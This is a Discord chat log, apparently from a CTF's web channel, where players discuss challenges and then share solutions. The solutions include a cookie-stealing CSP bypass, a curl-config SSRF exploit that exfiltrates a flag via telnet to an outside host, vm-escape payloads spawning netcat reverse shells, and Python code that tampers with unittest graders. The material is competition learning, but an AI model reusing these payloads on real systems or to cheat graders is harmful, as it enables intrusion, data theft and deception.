#web

hope you guys are ready for 14 nodejs xss challenges

always

it's actually just 1 challenge renamed 14 different things

ah shit

here we go again

https://tenor.com/6CTN.gif

all of it

When web is fancy crypto :kek:

fixing scorescope

i found the xss
where is the flag?

#create-ticket

I got unintended solution for web/gift i tihnk

#create-ticket

scorescope up?

:hmm:

https://gift.mc.ax/ is there meant to be service unavailable at this endpoint

should be back now

gift is going down for a little bit

oh thats why i was getting 50x's

@tame hawk when it's coming back?

🕸️

soon™️

NICE!

soon™️

the best time

:prayge:

https://gift.mc.ax/ up?

it'll be back soon

ok maybe i will wait for 30 minutes until the ctf will start

enough time for a smoke break 🚬

scorescope working for anyone?

i think is my bad...

yep yep

mine is perma grading 🙃 even with default template

ow lol

mine is also now

perma grading

did scorescope die ?

yes

yes

please reload

admin

@vital umbra @loud geode

fixing

some issues with web/gift! will come back up shortly

ew

it's back up btw

yay

scorescope up?

Cool challenge, I learned something new

I had no idea that was thing 🙂

What are you talking about lol

recursive-csp I suppose

me aswell. no just that but i didnt know wth IND_CCA2 was lol

this too

web chall is full of various sort of xss nd stuffs :smh

not helping stuck at recursice-csp T.T

create a ticket

is codebox down or is it just me ?

seems to work for me

codebox 3 solves in 12 mins

same deal, created a ticket

I thought I was good at python jailbreak, but ooof

ok, like 3 hours later I figured it out, agh 😓

Lots of good notes though! 🙂

same can't bypass the nonce csp

same lol

wait, you're meant to bypass it??

careful

let's not talk about how we're solving challenges lol

sorry can u delete messages

💀

hello, how bypass recursive-csp politics?

feel free to ask after the ctf is over

give me a hint

do we have all the files for unfinished? 😛

yup

Lol no

Is the Bad Gateway in unfinished part of the challenge?

i am unable to access my instance

It seems scorescope's autograder is not working properly, is the server ok?

Response got too slow for requests to /api/stream/*

Sorry, infra team is asleep atm, we'll look into those asap

if you're getting bad gateway errors for unfinished wait a minute for the instance to load

if it still doesn't work after that open a ticket

maybe try another browser

Can i DM for codebox

I think i found unintended method

Open a ticket

Waited few hours and it works fine now 😄

CodeBlox was a cute challenge, had fun

thanks

Think i'm not so skilled for these challenges, cant wait to see the writeups

You and me both! I'm struggling here, very excited to learn what I'm missing

Same

I know what the idea of the attack is for some

but i cant exploit it

im surprised there are only 2 solves for jnotes

Recursive csp got me tripping

i think scorescope had a hiccup

someone check infra?

(or was someone's solve too effective)

scorescope keeps crashing for me too

@loud geode

huh

seems to work for me but I'll take a closer look in a bit

seems to be working fine atm for me too

it was slow for a biot

bit

fine now

^

web best category

I enjoyed both web challenges I did

Insanity is increasing every second with the gift challenge

Still on csp recursive 💀

u can do it popsmoke 👍

It can't be brute force but there's literally no other way

https://tenor.com/view/gigachad-chad-gif-20773266

Average brute force enjoyer

Yes same but my pc will be done in 100000 lightyears

Same lmfao

My et was 2 years

🤡

buy a better pc

pay to win tbh

can someone solve impossible xss

please ty

Sure

If you give a writeup

that's why solving it = good

no because its impossible

there is no way to solve it

well I spent a whole day on that challenge and didn't even realise that I can get the source code 😂, so I guesses everything even the hashing algorithm and everything

but I had an idea that doesn't involve brute forcing yet when I saw the source code I realised it has a size limit in the payload

so my day is now ruined

lol

I didn't expect that mc.ax is on public suffix list 😢

Or use a faster language
Sometimes python is not the way to go

yeah I speak anaconda

https://tenor.com/view/parseltongue-harry-potter-chamber-of-secrets-speaking-snake-gif-13403737

I will die after one more waiting for sleep(s) in scorescope

🙂

huh scorescope shouldnt be sleeping

it learned to take breaks

these challenges are so frustrating. For the sake of my mental health i'll simply watch the writeups, because this is crazy.

I’ve been Stuck on jnotes for 6+ hours and I keep thinking I’m close then run into a problem. I’m just gonna wait for a write up it’s too hard.

lemon = waiting for write-up

time to check another challenge

waiting for the crbug.com post

web is hard

this is the first time I struggle that much with web challenges... bet those write-ups gonna be juicy 😆

Hi i'm new to CTFs, where can we find the write-ups after the CTF ends?

We'll probably make a writeups channel, and people can upload writeups on ctftime

I am sure that when I'll read recursive-csp writeup I am going to slap myself

Hard but good. Gonna be fun checking writeups later and see how much i missed 😭

web is hard - many of them are about things I've never heard before
very good learning chance

Can't wait to read a writeup about codeblock. I'm certainly overthinking it

I don't think you are? It feels like it uses techniques I just don't know about XD

Yeah I know the direction perhaps, but not sure how to do it exactly as it always lacks of an important detail for it to work

Haha, same thing, I wish I knew how to bypass that, and I find very exotic writeups on it, but nope, never works

RIGHT

So I don't have the payload

Ik the vuln tho

🤡

Oh wait I prob shouldn't say that

I have no clue, most of my knowledge is oriented around backend bugs

Wheeee sql injection go brrrr

it was unfortunate for me that all the challenges are about the front-end

No same but hey good learning

definitely can't always rely on one category ig

Just find a 0day and you'll be fine

💀😭

If that's the vuln I'm shooting myself

LMAO EIGHT

There was a ctf recently, where you could submit a url, the bot would then visit. And it literally was a chrome rce. Lol

👀

I hate those kinds of challenges, I always keep focus on the code and then it turns out that the solution is a CVE 😂

Yeah xD The first thing I do for now on is to check versions lol

lesson learned

we really do think of everything

we're registrars for the .ax TLD for this reason actually

possible to get hints for scorescope?

:)

yeah in like 2 hours

try opening a ticket but no guarantees lol

crap

@vital umbra same for Gift? I'm already hairless thanks to it

probably can't help much but you can try opening a ticket if you're experiencing a problem with something very specific

screenshotted+dmed to sleevi

ono

does sleevi even do PSL anymore

busted

seems like no

tragic

it python. use all the force

Do we get $50 bounty for solving unsolved challenges after the ctf

Hey admin, can you send me a gift

tbd

I'm not planning a bounty for impossible xss

We don't have it just saying lol

super guesser strong

we are still discussing, there might be one

I assure you, impossible xss is quite possible

:)

false advertising :^)

yeh

imagine false advertising

smh

Sad I'm so close to flag gift but, I'm getting out of time

Can't wait to see the writeup !

where flag

LMAO

bro said extra credit

💪

Btw, are there going to be organizers writeups for webs?

I would love to read them

2 minutes left woooooooooooooooo

can someone just send like an entire writeup for every web

explained in idiot terms

🙏

🥺

we'll release some writeups probably

if you want a hint for impossible-xss while we're still putting together writeups: || xml ||

hey wait a minute

ctf is still going

ban

oop

ban

Oh no they might solve it in 30 seconds

aint no way

now

LMAO

writeup pls

Solved it

Just what I needed

i got it in 1 second

Aaron is giving too many challenge hints

Kicked off dice

how did u leak this f** private key on gift ???

writeups plz

Yes pllllssss 😭

codebox please

writeup for codebox pls

Explain gift please!

csp injection and leak with scritp-sample and report-uri

and scorescope

was web/unfinished TLS poisoning

how do u do scorescope lmao

what-

wtf

script-sample/

you can require trusted types as part of CSP with require-trusted-types-for, you need ?code=&code=[payload] to trick the client into not setting the textarea but setting the h1 while the server still modifies CSP and report-uri to leak

Code box is csp injection with bypass on query parse

you need to actually pass the test cases smh

imagine cheating on assignments

what was the payload for scorescope?

https://codebox.mc.ax/?code=&code=%3Cimg+src%3D%22*%3B+require-trusted-types-for+%27script%27+%3B+report-uri+https%3A%2F%2Fztwajhrp7wf40bww2y4i23ctvk1cp2dr.[BURPSUITE]%2F%22+%3E

this was the payload to flag

yes

for scorescope I just wrote the algorithms as asked

You had to modify the global tests list

you can overwrite the test cases using sys.modules

wait bruh

I just actually solved all of them

💀

seriously???

Explain gift!

no you could just use telnet protocol and -T to ssrf to mongodb

damm bro. you have a quantum computer or somthing

why was scorescopein web

how do you use telnet

objectively misc

lol

i see that's cool

what did u ssrf to mongo in unfinished?

blind

I think that was just an honest mistake and he was too lazy to move

creative solution for scorescope lol

iT hAs a wEb iNtErFaCe

i used telnet protocol for unfinished to talk to mongodb

telnet protocol? but doens't it check

I used ftp

it's a pyjail though?

gotcha lol

but what to send to it

mongodb wire protocol packet

scorescope was easiest web, codebox second

blind SSRF annoying

which does what?

I was gonna TLS poison

outputs flag

then you can save output to file on fs and upload

Mais pourquoi deux fois code ?

unfinished?

writeup for gift?

ah ok

so my ftp way spoiled it

TLS poisoning was one way to solve geminiblog

can someone explain recursive-csp please

unintended for unfinished is write js code in node_modules that runs

because ftp data connections are not logged

because i forgot to make that folder unwritable

oh bruh

I could have done that

xd

for scorescope I just returned an object that always __eq__ to true

codescope solution:

    return list(filter( lambda x: s in str(x), [b for b in {}.__class__.__base__.__subclasses__()] ))

def fake_call_test(*a):
    print("FAKE CALL", *a)
    return 1

hax = findclass(".TestCase")[0]
setattr(hax, "_callTestMethod", fake_call_test)

me not understanding a single thing being said at this point

🥲

for preimage

def preimage(hash):
    builtins = ''.__class__.__class__.__subclasses__(''.__class__.__class__)[0].register.__builtins__
    imp = builtins["__import__"]

    # solves test_preimage_b which actually uses hashlib.sha256 by monkeypatching it
    imp("hashlib").sha256 = lambda x: h(imp("inspect").currentframe().f_back.f_code.co_consts[-1])
    # solves test_preimage_a which is just comparison to the constant string "dicectf"
    return e()

to get the client to connect to memcached?

Miss click mdr

much easier: import __main__ then you can modify __main__.tests

I didn't get the last part of the chall but, gift was about client side race condition on /api/info + Dunggling Markup on /create/Infinity to get the public key (I have no idea how to get the private one to solve the challenge 😦

<?php
    $bytes = random_bytes(5);
    $random = bin2hex($bytes);
?>

<form id="x" method="POST" action="https://gift.mc.ax/api/login" enctype="text/plain">
    <input name='{"name":"<?= $random ?><meta http-equiv=\&quot;refresh\&quot; content=\&quot;0;<?= $_GET["remote"] ?>?content=","random":"' value='aa"}'>
</form>

<script>
    step = new URLSearchParams(document.location.search).get("step");

    if (step == "1") {
        window.open("?step=2&remote=<?= $_GET["remote"] ?>");
        document.location = "https://gift.mc.ax/create/Infinity";
    }

    if (step == "2") {
        x.submit();
    }
</script>

to send arbitrary commands to memcached, yea

ow lol

other way was sni injection

huh, interesting

def magic():
    builtins = ''.__class__.__class__.__subclasses__(''.__class__.__class__)[0].register.__builtins__
    imp = builtins["__import__"]

    parent_frame = imp("inspect").currentframe().f_back
    parent_frame2 = imp("inspect").currentframe().f_back.f_back
    consts1 = parent_frame.f_locals
    consts2 = parent_frame2.f_locals

    # Patch test_hidden
    # The nesting level is not 9 in test_magic_c, so we cannot patch there
    if ".0" not in consts1:    
        next(iter(next(iter(list(imp("inspect").currentframe().f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_locals['self'])[7])))).__class__.test_hidden = lambda self: True

    if ".0" in consts1:
        # First time, should return correct values
        if parent_frame2.f_lineno == 18:
            idx = 64 - consts1[".0"].__length_hint__()
            return consts2["targets"][idx - 1]

        # Second time, should return incorrect values
        return 1

    return e()

limit was undefined

as default

okay so is unfinished solvable using TLS poisoning though

idk

Limit was 0 by default ??

for scorescope I just used a bunch of these:

sys.modules['test_6_preimage'].TestPreimage.test_preimage_b = lambda *args, **kwargs: return True

no ;

What ???

i love javascript

och yet another CSP well documented feature

🫠

js moment

I have the source code where data.limit=0 ???

but there are no semicolons there

yep and there is no ; after that

so javascript interprets it differently

???? it was 0 not undefine

anyone jnote ?

What the fuck 😂😂

Fuck js as always lol

nice

it's undefined because there is no 0[logger]

0[console.log, logger] is undefined

Nan mais les deux param code ?

Yeye i see it

I legit blocked the API call with base href thanks to the CSP that didn't worked

J’ai pas fais exprès y’en a un en trop

use the xss to set document.cookie='note="; Path=//', then access // and the flag will be in the note

bug in jetty's cookie parsing lets you smuggle cookies

I only solved scorescope and codebox

My payload solver for recursive csp:

from zlib import crc32

script = """<script nonce="ffffffff">document.location="http://IP:PORT/"+document.cookie;</script>"""

for seeds in range(1000):
    h = str(seeds)
    payload = script + h
    c = crc32(payload.encode())
    cb = (0xffffffff ^ c).to_bytes(4, "little")
    if all(b < 128 and chr(b).isalnum() for b in cb):
        blob = payload.encode() + cb
        print(len(blob), repr(blob))
        print(hex(crc32(blob)))

hah imagine knowing how CRC32 works

I just use PHP brute-force by appending "a" which kills my computer

tbh started reading that java crap but didnt make it

was the parameter injection (to openssl) intended for geminiblog? I didn't manage to get openssl to emit a valid gemini header, but afaict that's all I needed to get the flag.

I was 99% sure that it is fucked cookie parsing

Thank you sir. Can you explain it. I read so many documents about crc32 my brain broke

this is just forcing the CRC32 to specific value

yeh but why does that work

is there official for unfinished?

another recursive csp solve, but it construct the matrix directly

Yet another solution to scorescope

import sys


class FakeList(sys.modules["collections"].abc.MutableSequence):
    def __init__(self, reallist):
        self.list = list()
        self.reallist = reallist

    def __len__(self):
        return len(self.list)

    def __getitem__(self, i):
        return self.list[i]

    def __delitem__(self, i):
        del self.list[i]

    def __setitem__(self, i, v):
        self.list[i] = v

    def insert(self, i, v):
        self.reallist.insert(i, v)

    def __str__(self):
        return str(self.list)


def add(a, b):
    sys.modules["util"].hide.clear()
    results = sys.modules["inspect"].currentframe().f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_locals["result"]
    results.errors = FakeList(results.successes)
    results.failures = results.errors
    results.missing = results.errors

the others functions are left untouched

I also spam f_back lol

next(iter(next(iter(list(imp("inspect").currentframe().f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_back.f_locals['self'])[7])))).__class__.test_hidden 
``` in test_magic_a and test_magic_b (but not c since the list comprehensions mess up the layers)

math overflow

def magic():
    if ".0" in consts1:
        # First time, should return correct values
        if parent_frame2.f_lineno == 18:
            idx = 64 - consts1[".0"].__length_hint__()
            return consts2["targets"][idx - 1]

        # Second time, should return incorrect values
        return 1

use line number to solve test_magic_c with actual correct answer

impossible xss sol?

when you append the NOT of the CRC to the payload, the CRC of the concatenation is always ffffffff

oh whaaat

thats kinda crazy

Does anyone have a good resource or something like that for codebox ?

math is wierd

@knotty tinsel 😄

writeup for unifinished please, how did you login?

you don't have to, it's blind SSRF/curl command injection

And how did you do that?

just make request to /api/ping, it doesn't check properly even though it gives you redirect message (so it's blind)

is this zero day?

|| XXE ||

My solution to magic a b and c (that I found before the more general solution)
I just checked if the variable correct was declared

def magic():
    if ("targets" in sys.modules["inspect"].currentframe().f_back.f_back.f_locals):
        targets = sys.modules["inspect"].currentframe().f_back.f_back.f_locals["targets"]
        i = sys.modules["inspect"].currentframe().f_back.f_locals["_"]
        x = targets[i]
        if ("correct" in sys.modules["inspect"].currentframe().f_back.f_back.f_locals):
            x = 1
        return x
    random = test = sys.modules["inspect"].currentframe().f_back.f_locals["self"].rng
    random.seed(585)
    x = random.randint(0, 255)
    random.seed(585)
    return x

login check is flawed, there's no return after redirect so it still runs

oh lol

you write to config -o/-K ?

omg lol no way

thank you

the middleware doesn't return and still calls next() so it's not really blocking

yeah

jetty zero day?

no in jetty

but how do you address mongodb?

I have no idea :)

^ telnet

lolol ofc

unfinished exploit: ```py
import requests
import time

url = 'https://unfinished-90476bd8497c68a4.mc.ax'

with open('raw_packet.txt', 'wb') as fout:
fout.write(b'\x92\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\xdd\x07\x00\x00\x00\x00\x00\x00\x00\x7d\x00\x00\x00\x02\x66\x69\x6e\x64\x00\x05\x00\x00\x00\x66\x6c\x61\x67\x00\x03\x66\x69\x6c\x74\x65\x72\x00\x05\x00\x00\x00\x00\x10\x6c\x69\x6d\x69\x74\x00\x01\x00\x00\x00\x08\x73\x69\x6e\x67\x6c\x65\x42\x61\x74\x63\x68\x00\x01\x10\x62\x61\x74\x63\x68\x53\x69\x7a\x65\x00\x01\x00\x00\x00\x03\x6c\x73\x69\x64\x00\x1e\x00\x00\x00\x05\x69\x64\x00\x10\x00\x00\x00\x04\xce\x2d\x77\x58\x58\xfd\x41\xc2\x98\xf9\x10\xbf\x99\x02\xfe\x2d\x00\x02\x24\x64\x62\x00\x07\x00\x00\x00\x73\x65\x63\x72\x65\x74\x00\x00')

print('upload packet contents')
res = requests.post('%s/api/ping' % url, data = {
'url': 'http://[...]/raw_packet.txt',
'opt': '-o',
'data': 'GET',
})
assert res.status_code == 200

time.sleep(5)

print('upload curl config')
with open('curl.config', 'wb') as fout:
fout.write(("""
next
url="telnet://mongodb:27017"
upload-file="GET"
output="flag.txt"
no-buffer
""").strip().encode())

res = requests.post('%s/api/ping' % url, data = {
'url': 'http://[...]/curl.config',
'opt': '-o',
'data': 'POST',
})
assert res.status_code == 200

time.sleep(5)

print('download flag')
try:
res = requests.post('%s/api/ping' % url, data = {
'url': 'http://google.com/',
'opt': '-K',
'data': 'POST',
})
assert res.status_code == 200
except:
pass

time.sleep(10)

print('upload exfil config')
with open('curl.config', 'wb') as fout:
fout.write(("""
next
url="telnet://[...]:1337"
upload-file="flag.txt"
""").strip().encode())

res = requests.post('%s/api/ping' % url, data = {
'url': 'http://[...]/curl.config',
'opt': '-o',
'data': 'POST',
})
assert res.status_code == 200

time.sleep(5)

print('exfil')
try:
res = requests.post('%s/api/ping' % url, data = {
'url': 'http://google.com/',
'opt': '-K',
'data': 'POST',
})
assert res.status_code == 200
except:
pass```

what

how

u serious?

the telnet waits for stdin...?

hes serious

it can't be

oh I see you need file called POST or GET to smuggle anything in FS

wat

wo

what is doing that

dude there's a fucking COMMENT in between the lines and js still thinks it's the same statement

html?

svg?

iwanna knowwwww

well yeah comment can be not on a line by itself

or just files displayed as xml?

I knew js was weird but that's crazy

dafuq

anyway, amazing web challs

what if you had something like this ```js
$("html") // get root node using jQuery
.attr("class", "dark-mode");

something similar to "friends" in corctf2022, which is by the same author

this web was really fun, gift I had no idea how to I think it was dangling markup on /api/login CSRF (SameSite=None)

how do u leak private on gift? @vital umbra

dangling markup for public

that's the fun part, you don't!

jwtjail? :D

yeah, makes sense

no it wasn't

https://pastebin.com/ysx6rt1V

pw?

it is

undefined xD

writeup

we tested

my jwtjail solve:

fetch("/api/verify", {
    method: "POST",
    headers: {
        "Content-Type": "application/x-www-form-urlencoded"
    },
    body: `token="eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.LLPW3b1BzsGRHh1AiHDi6W6RKK-k7INCN_gkvzJUlfo"&secretOrPrivateKey={
    constructor: {
        name: {
            [Symbol.toPrimitive]: new Proxy(_=>_, {
                apply(a,b,c) {
                   c.constructor.constructor("return this")().process.binding("spawn_sync").spawn({"args":["nc","IP","12345","-e","/bin/sh"],"file":"nc","stdio":[{"type":"pipe","readable":true,"writable":false}]})
                }
            })
        }
    }
}`
})

bruh

apply

jwtjail ```js
(function(){
let a = {};
const customInspectSymbol = Symbol.for('nodejs.util.inspect.custom');
let b = {
customInspectSymbol {
let process = j.constructor.constructor('return process')();
// stolen from https://jwlss.pw/mathjs/
let spawn_sync = process.binding('spawn_sync'); normalizeSpawnArguments = function(c,b,a){if(Array.isArray(b)?b=b.slice(0):(a=b,b=[]),a===undefined&&(a={}),a=Object.assign({},a),a.shell){const g=[c].concat(b).join(' ');typeof a.shell==='string'?c=a.shell:c='/bin/sh',b=['-c',g];}typeof a.argv0==='string'?b.unshift(a.argv0):b.unshift(c);var d=a.env||process.env;var e=[];for(var f in d)e.push(f+'='+d[f]);return{file:c,args:b,options:a,envPairs:e};};
let spawnSync = function(){var d=normalizeSpawnArguments.apply(null,arguments);var a=d.options;var c;if(a.file=d.file,a.args=d.args,a.envPairs=d.envPairs,a.stdio=[{type:'pipe',readable:!0,writable:!1},{type:'pipe',readable:!1,writable:!0},{type:'pipe',readable:!1,writable:!0}],a.input){var g=a.stdio[0]=util._extend({},a.stdio[0]);g.input=a.input;}for(c=0;c<a.stdio.length;c++){var e=a.stdio[c]&&a.stdio[c].input;if(e!=null){var f=a.stdio[c]=util._extend({},a.stdio[c]);isUint8Array(e)?f.input=e:f.input=Buffer.from(e,a.encoding);}}console.log(a);var b=spawn_sync.spawn(a);if(b.output&&a.encoding&&a.encoding!=='buffer')for(c=0;c<b.output.length;c++){if(!b.output[c])continue;b.output[c]=b.output[c].toString(a.encoding);}return b.stdout=b.output&&b.output[1],b.stderr=b.output&&b.output[2],b.error&&(b.error= b.error + 'spawnSync '+d.file,b.error.path=d.file,b.error.spawnargs=d.args.slice(1)),b;};
let f = spawnSync('sh', ['-c', 'ls | nc seraphin.xyz 25565']).stdout.toString();
throw f;
return "inspect";
}
}
a = b;
a.constructor = null;
return a;
})()

TLDR: proxy apply trap 3rd arg is argsList which is array that comes from outside vm, which you can use to escape

then process.binding -> RCE

I have no idea how to tell what is from outside VM in proxy traps, just brute force using loop in arguments?

other solve was that mess above

it is undefined xD console.log it

https://blog.ankursundara.com/dicectf23-writeups/

Writeups for my challenges (jnotes impossible-xss and geminiblog)

impossible-xss is really good

^

It's mostly just weird browser trivia

scorescope was probably my favourite pyjail

didn't feel too restrictive

ctypes was blocked? I know syscalls were blocked, auditing events or seccomp?

probably auditing

eval is open

maybe it was auditing with checking "os"

Oh wtf

seccomp was imported from util

what?

oh wait yeah i remember seeing seccomp in modules

how do you know

i'm no longer able to read code

lol

JS automatic semicolon insertioneverything about JS does that to you sometimes

I love Kali

why do I get clowned on in other programming servers when I say that

why?

no ; so the line below the comment is in the same statement

I would have never seen that lol

    util = __import__("util")
    raise RuntimeError(dir(util))


RuntimeError: ['SilentResult', 'SubmissionImporter', 'TestCase', '__builtins__', '__cached__', '__doc__', '__file__', '__loader__', '__name__', '__package__', '__spec__', 'hidden', 'hide', 'importlib', 'seccomp', 'sys', 'traceback', 'unittest']

oh

wait what

__import__ makes it failed to grade

i thought new line was new statement in js

did you overwrite?

like you don't really need to put ;

no, it just kinda ends statements where it feels is right

huh it didn't for me?

lmao was that intentional?

i guess

I guess so. Biggest troll ever

we couldn't know it without console.log tbh

has someone made a static analyzer for that

apparently the author did that in another ctf so if you'd seen it before you'd probably have spotted it

weird it always does that to me

now i'll be aware

here.

the author made cookie-recipies

🤪

wow. mdn mentions this lol. i thought i know script-src

bug on the line gift.limit = 0

i wonder how long it has been there

yeah, it's not too unrealistic. I can see a dev forgetting the ; and spending hours trying to figure out what's wrong

just js being js

It's what gave me the idea for the challenge

lmao troll

👍 .

I had figured out the dangling markup and was trying to get the private token somehow

i had this in my file the whole time but never used it, maybe related to this

import importlib
try:
    import os
    importlib.reload(os)    
except:
    pass

hmm maybe

I had to get __import__ from somewhere else

    builtins = ''.__class__.__class__.__subclasses__(''.__class__.__class__)[0].register.__builtins__
    imp = builtins["__import__"]```

ABCMeta.register is very rare because it is a normal function, not even a class method

lolol

so it is very useful for getting stuff like __self__, __code__ or whatever

@hollow geyser on our team solved it via

main = vars(__import__("__main__"))['sys'].modules['__main__']
main.tests = ['test_favorite' for _ in range(22)]

and just return 12? lol

yeah

I actually implement each one individually

lmaoo

i thought this chal was a web chal

and was trying to do seccomp bypass stuff

kinda pissed

# A class whose instances are always equal to any other object when checked using the `==` operator, and returns itself when arithmetic is done on it
class e:
    def __eq__(self, other): return True
    def __gt__(self, other): return True
    def __mul__(self, other): return self

# A fake hashlib hash object that returns whatever string value is passed to it from a method called `hexdigest`
class h:
    def __init__(self, fake_digest): self.fake_digest = fake_digest
    def hexdigest(self): return self.fake_digest

def preimage(hash):
    '''
    Given a sha256 hash, find a preimage (bytes).

    Parameters:
        hash (str): The sha256 hash of a string in hex.

    Returns:
        bytes: A preimage of the hash.
    '''

    ######## YOUR CODE ########

    builtins = ''.__class__.__class__.__subclasses__(''.__class__.__class__)[0].register.__builtins__
    imp = builtins["__import__"]

    # solves test_preimage_b which actually uses hashlib.sha256 by monkeypatching it
    imp("hashlib").sha256 = lambda x: h(imp("inspect").currentframe().f_back.f_code.co_consts[-1])
    # solves test_preimage_a which is just comparison to the constant string "dicectf"
    return e()

    ###########################

anything with a website is automatically a web challenge

😭

how do I make firefox stop hanging when I tying int dsicordfs

it hgn

😭

impossible web challenge

my solution was using sys._getframe to look up the stack

inspect.stack is blocked somehow? or

it causes failed to grade as well

maybe it's the auditing event for f_code... except you can actually access f_code

i thought we needed unrestricted rce since it was web category so i spent time trying to leak seccomp filter by dumping memory

idk how inspect.stack is blocked

i think this is misc or pwn (if you have a VERY broad definition of pwn)

anuone done imposiblexss?

idk exactly which but one of them makes it open up the file contents

which gets seccomped

no

i had local exploit but didnt work on remote

getsource?

LOL

maybe idk

some inspect stuff just didnt work

yea I tried using inspect to get the source code and the file access killed it

but sys contains a lot of what u need

u can dump bytecode

yeah inspect makes some blocked syscalls 😭

I used dis.dis and inspect frame f_code

same

also if u just looked at the locals

inspect just calls sys

😭

the variable names sorta seemed reasonably descriptive

locals were useful for test_magic_c and getting the TestSuite

I even tried to use the LOAD_CONST bug on scorescope but still failed for some reason

I wonder how many people just tried to write the code normally

lol

i just printed out sys.modules slowly and overwrite modules

slowly? you can just raise any exception manually and get full output

you don't need to use the assert

😠

not web

guys what is 9 + 1

i need it for an assignment

/gen /srs

🤪

? rude

thanks u

okay

so

i have to the conclusion that

the nesting level to the class with self with full testsuite in test_magic_c

is

wait for it!

🥁

it is 10

okay thanks for coming to my TED Talk

ok.

wow i can do this for a living

hidden test case is always the tricky one

lmao starlight

que?

Will the source be released for the challenge

Really want to see how the seccomp was implemented xd

Video write up for recursive-csp (4:20 mins) https://youtu.be/7077pH14-kE

it's just libseccomp

Ah i see

yet another scorescope exploit

def win(self, *args, **kwargs):
    for err in self.errors:
        self.successes.append((err[0], None))
    for fail in self.failures:
        self.successes.append((fail[0], None))
    self.errors = []
    self.failures = []
    self.wasSuccessful = lambda *a, **kw: True

and then put this in any test case:

sys.modules['util'].SilentResult.stopTestRun = win

How did you get the actual code out of the f_code? I had this elaborate setup trying to get the testResult out of the 16th stack frame back

huh I was running afoul of seccomp when I tried to print errors, or so I thought, oh well, messed something up stupid.

you can do

marshal.dumps(sys.modules['util'].SilentResult.stopTestRun.__code__)

then unmarshal the code object and dis.dis it

oh right, dis dis

yeah I had a code object, derp

but also, the classes extend the python unittest classes, so you can just look up what the functions do

I had this whole rediculous class setup

I would throw a Framer Exception and in the str it crawled the stack back and printed out all locals args code etc, I saw the test_8_hidden and saw its code I just couldn't figure out how to get the errors out of the SilentResult

I thought I was running against the filter, but prob just causing an error, oh well

we overwrote a lot of unittest.TestCase's assert functions to automatically pass all tests but the hidden one

then we passed the hidden test with this:

@classmethod
def setUpClass(cls):
    cls.test_hidden = noop

__import__('unittest').TestCase.setUpClass=setUpClass```

Did the same first step, then overwrite the actual testcase because through all manner of introspection, I'd found the module and class containing the hidden test

wait, you need to dis.dis locally?

does dis.dis not work on server?

it might be trying to read the source code from a file

which seccomp doesn't like

lol that didn't even occur to me - you should definitely be able to dis on the server

where did you get the CDs?

yes, I did

I'm also curious to hear any opinions on challenges like impossible-xss, is it appropriate to run in a CTF, is the solution path too unclear for it to be fun, etc? Feel free to dm me

Anybody has writeup for gift? plz 🙏

wait, hold up

you mean, the python bytecode that I exported, I could have just done dis dis on locally?

🪦

i like the sort of "open-ended" style challenges a lot 🙂 removing the "oh this very specific functionality exists, so it must be relevant to the solution" aspect is quite nice. however i do think they generally take longer to solve so i tend to not look at stuff like impossible-xss until clearing the rest

What's the difference between doing this directly to __main__ as opposed to doing it through sys.modules? I did exactly this and I could replace up to 21 test cases with one that passes but when I replaced the 22nd the Eventsource stuff ended up returning nothing

Wait what

It does work

Fuck

I must have had something else in the script that messed it up

@vital umbra Don't think I won't forget this

😳

I always try to play 4d chess when I did not try checkers 😦

"IT CANT BE THAT SIMPLE" --yes it is

very good

@halcyon oriole lmaoo

What team were u on

IMO it was fine, and it's not guessy because I knew the goal

It would've been fun if I spent time on it heh but there were so many other chals to do because I'm bad at web

It's the kind of web chal I like tbh

Where u have to dig into some obscure feature of existing (i.e. not canned lol) software

b01lers (Purdue's team)

The people working on it (including me) weren't too experienced so we didn't get too many of them

Oh nice!

Nice to see you're ctfing again 🙂

Bruh I feel so rusty

Haven't done CTF in too long

This is the wakeup call

😭

Solution path was clear enough, I was just not aware enough at 3-4am to notice that you could request external resources

ur god

What team are you playing with?

this was inadvertently a clue

OSUSEC haha

@prime folio Oh they still let you play after dropping? That's cool. Btw I don't know if this would actually happen but I'm currently the PR person for b01lers so if you're ever interested in giving a talk at a meeting or something we're always interested

impossible-xss is really good

I'm mad that I didn't solve it.

cope

seething

mald

definitely not intended as a hint, as I had not even seen the challenge at that point

😅

Apollo's gift

any wu for jnotes ?

linked in the author writeup hackmd https://hackmd.io/@defund-dicegang/rk3RO56hi

It was OK, but if you wanted to make it more more straightforward u could allow ppl to upload files for example, this would point a little to research different file formats and what can be done with them, but it's only imo

I am satisfied anyway xD

Looking at the soln 🤯

I learned that there's unittesting in Python from this CTF, but given the scenario in the challenge, is it a bad idea after all (i.e. what can people do to secure the thing)?

feed input to submissions through e.g. stdin so that it doesn't share the runtime of the grading code, sandboxing

For regular unit testing, you're generally not really concerned about "security" though, or not in that sense

Testing code is definitely a good thing to do

web/gift unintended solution that got fixed:

I changed the URL to https://gift.mc.ax/create/NaN , claimed it on another account, and on the account where my money was $NaN i could make multiple claimable $1e+308 gifts. I might've been able to already see the flag from the $NaN account but i didn't try that, I'm not sure if NaN counts as >= Infinity. They patched the challenge to disallow making $NaN value gifts.

very nice !

fixed?

context: #announcements message

am I being dumb? I'm in the docker container for 'unfinished' and I didn't think the node_modules folder was writable

nor can I write to /app/node_modules/express/test.txt

Yesn't. NaN would be the same as infinity sometimes in javascript. But its javascript so we will never know

If Javascript follows the standard floating point rules NaN never compares true to anything including itself

Infinity is different, it is equal to itself (e.g. Number("1e500"))

Ooh I'll keep that in mind 👀

write to /home/user/node_modules/kerberos.js

you can find that path using strace, you see which random js files are looked for

ah, brilliant, ty

I was thinking /app/node_modules/express.js which would load before /app/node_modules/express/index.js

usually, when you test code, the code isn't trying to trick the unit tests into passing haha. in those cases, because we know our own code is not doing anything too funny, it's completely fine. however, a lot of automated homework grading software uses python unittesting to check the correctness of submissions, and that is not safe without manual review

I think homework graders rely on the fact that submissions are recorded for security

suspect instructors would not be very happy if they discovered you were tricking the grader

so the grader doesn't have to try very hard to prevent this kind of behavior

because humans exist

this is why u must get reverse shell on ur first assignment in the class

lol

cuz nobody will suspect ur hello world assignment

society is glad you dropped out of university

Some of the assignments here extracted if you passed by checking first printed line, so what you could do is just print that you got full points :v

interesting 🤔
